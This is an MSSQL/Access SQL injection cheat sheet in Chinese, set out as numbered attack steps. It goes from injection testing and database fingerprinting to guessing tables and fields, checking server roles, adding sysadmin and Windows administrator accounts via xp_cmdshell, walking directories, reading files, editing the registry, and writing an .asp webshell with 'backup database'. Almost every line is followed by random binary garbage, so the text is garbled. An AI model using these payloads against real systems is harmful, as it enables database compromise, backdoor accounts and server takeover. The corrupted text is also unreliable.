1.判断是否有注入;and 1=1 ;and 1=2 y�u�&mu�CA
2.初步判断是否是mssql ;and user>0 U�Zmo?�&y�
o*2Mj�d]�r
3.注入参数是字符'and [查询条件] and ''=' 9U4[o<�G]=
Z9q4�W:jyS
4.搜索时没过滤参数的'and [查询条件] and '%25'=' IKaW�],sr#
=e0MEV#�s.
5.判断数据库系统 �~�w�OM�T
�at�w*t1)g
;and (select count(*) from sysobjects)>0 mssql jeJspch�+#
E7h�s�+Mh�
;and (select count(*) from msysobjects)>0 access _8-T?j**
�
/3�VO!V�]u
�w�4�_Xby)
��f`_{SU"3
6.猜数据库 ;and (select Count(*) from [数据库名])>0 f9
�:���=6
/-t!)_zvw�
7.猜字段 ;and (select Count(字段名) from 数据库名)>0 l*h�uKSX�}
eV�B43�]g�
8.猜字段中记录长度 ;and (select top 1 len(字段名) from 数据库名)>0 �y�>�#k�T�
��X.�FoX��
9.(1)猜字段的ascii值(access) ~4O3~Y_+GN
_HjB'�XNr(
;and (select top 1 asc(mid(字段名,1,1)) from 数据库名)>0 Su�Nc&�e#(
_�MuzD&^qE
(2)猜字段的ascii值(mssql) BwGO�n)K�L
k��sOc,4A�
;and (select top 1 unicode(substring(字段名,1,1)) from 数据库名)>0 ;b. �m� �X
)?$���@cvf
10.测试权限结构(mssql) AK%&Kq&PaY
Sa�0IRC<LV
TTbJ9O�<43
V~Z�)�^.6
;and 1=(select IS_SRVROLEMEMBER('sysadmin'));-- X�D|Xd|/ {
��7/_|/4&�
;and 1=(select IS_SRVROLEMEMBER('serveradmin'));-- 0>D*�d'xLd
�F��9d�6#~
;and 1=(select IS_SRVROLEMEMBER('setupadmin'));-- �Ciz,1IV��
ShvC4Xb 0�
;and 1=(select IS_SRVROLEMEMBER('securityadmin'));-- q?)�5yukeF
���TU�6YS<
;and 1=(select IS_SRVROLEMEMBER('diskadmin'));-- �Qh6�vH9(D
j��9GKz1�
;and 1=(select IS_SRVROLEMEMBER('bulkadmin'));-- !'�IZr{Y>
�7y4�2�)X�
;and 1=(select IS_MEMBER('db_owner'));-- q�8�.Z7ux�
8� �nqF� i
�y�4aT-^C'
�%e)�vl[:}
11.添加mssql和系统的帐户 x\yr~�$}(J
;]=@;? �9�
;exec master.dbo.sp_addlogin username;-- o4@d,uI�w^
;exec master.dbo.sp_password null,username,password;-- iT�s"�R��W
`�ZO5-E���
;exec master.dbo.sp_addsrvrolemember sysadmin username;-- ��l-�!" �
�lbw+!{Ch�
;exec master.dbo.xp_cmdshell 'net user username password &5sPw^{,H�
dM19�;R@4�
/workstations:*/times:all/passwordchg:yes /passwordreq:yes /active:yes /add';-- bY*_6S�PK4
|id7@3le�u
;exec master.dbo.xp_cmdshell 'net user username password /add';-- �oH�p"\Z�&
<�<Y]P�+uU
;exec master.dbo.xp_cmdshell 'net localgroup administrators username /add';-- �#p�P�R>,4
�E[�=&6�T4
w����(X��}
*�C�Az�_s<
12.(1)遍历目录 .y_�~mr�&d
_3O�*�"S=1
;create table dirs(paths varchar(100), id int) nD�>�X?yz2
:_2:Fh.}3~
;insert dirs exec master.dbo.xp_dirtree 'c:\' Dq�9�f Fe�
hkV*UH��{�
;and (select top 1 paths from dirs)>0 W<[7Ld��AB
�
�j0O1??�
;and (select top 1 paths from dirs where paths not in('上步得到的paths'))>) /�L�2n
~�/
-�]Mk}
z$�
Gukw�N]*OY
Vk�J�TcC:1
(2)遍历目录 �X7:Dw]t��
dS� \n�2Qb
;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));-- ,�zH�\P+�*
;insert temp exec master.dbo.xp_availablemedia;-- 获得当前所有驱动器 3�,{;w�J
Z
�3[l\l5'm8
;insert into temp(id) exec master.dbo.xp_subdirs 'c:\';-- 获得子目录列表 ";jAH��GbO
�D&@ js!|5
;insert into temp(id,num1) exec master.dbo.xp_dirtree 'c:\';-- 获得所有子目录的目录树构 xd��Y'i0fh
I$�)9T^�Ra
;insert into temp(id) exec master.dbo.xp_cmdshell 'type c:\web\index.asp';-- 查看文件的内容 u�:�J4Az^!
m7��XN6zX�
%u<�r_^w5�
jGJf[:M&Pm
13.mssql中的存储过程 �'d�;a��AG
)cZ KB0*�+
xp_regenumvalues 注册表根键, 子键 W?.�x�tQEv
K:Z�,��4�Y
;exec xp_regenumvalues 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Run' 以多个记录集方式返回所有键值 A)d0��Z6G`
E��5c)\
D�
xp_regread 根键,子键,键值名 �C:��bA:O�
�<�S;YNHLC
;exec xp_regread �L��W(�"/�
��kI5�LG�6
'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','CommonFilesDir' 返回制定键的值 3W.D^^)eCV
d�~�Q�J}�a
xp_regwrite 根键,子键, 值名, 值类型, 值 *tk�f�)[(
-�GQ.B{%G�
值类型有2种REG_SZ 表示字符型,REG_DWORD 表示整型 T2m�ZkK?rA
�N�cX-*��o
;exec xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName','reg_sz','hello' 写入注册表 ANj%q9e!Yi
2"P�1�I���
xp_regdeletevalue 根键,子键,值名 qEdY]t ���
vt�5>>r�l�
exec xp_regdeletevalue 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName' 删除某个值
!y!s/i&P%
@cm[]]f'�l
xp_regdeletekey 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Testkey' 删除键,包括该键下所有值 ��^r]-v++
2!{_�x�8,n
,5�K&f\���
?6�I`$ &OA
14.mssql的backup创建webshell A^0-%�Ygl�
�?o/p}��6�
use model ilQ\�+xR{b
�Y�x� �;�j
create table cmd(str image); t��o�#2.�
F0�r�5$Pl*
insert into cmd(str) values (''); �09G�]t1!,
�
TL�Vfu4�
backup database model to disk='c:\l.asp'; �b�
Hy<`p0
[ei5QSL |�
�I9U
8@e!X
q��zo)\��,
15.mssql内置函数 `<Hc,D�; p
x0TE+rf5 �
;and (select @@version)>0 获得Windows的版本号 Gt����!Hm(
: B1
"=ly
;and user_name()='dbo' 判断当前系统的连接用户是不是sa o+R(���ux"
I4c����%>R
;and (select user_name())>0 爆当前系统的连接用户 W>�P��:EI1
8@T�0]v�H&
;and (select db_name())>0 得到当前连接的数据库 G~Y#�l@8M+
�f\~w!��-�
x�u��;^��F
P�M {L}tEQ
16.简洁的webshell kaDn=
={YM
: R8+jO���
use model &N�%-�.&t'
2fPMZ7Zd3�
create table cmd(str image); *\Hut'7 d�
~H]��d9�C�
insert into cmd(str) values (''); y���G>�sBc
$� WWi2cI;
backup database model to disk='g:\wwwtest\l.asp';
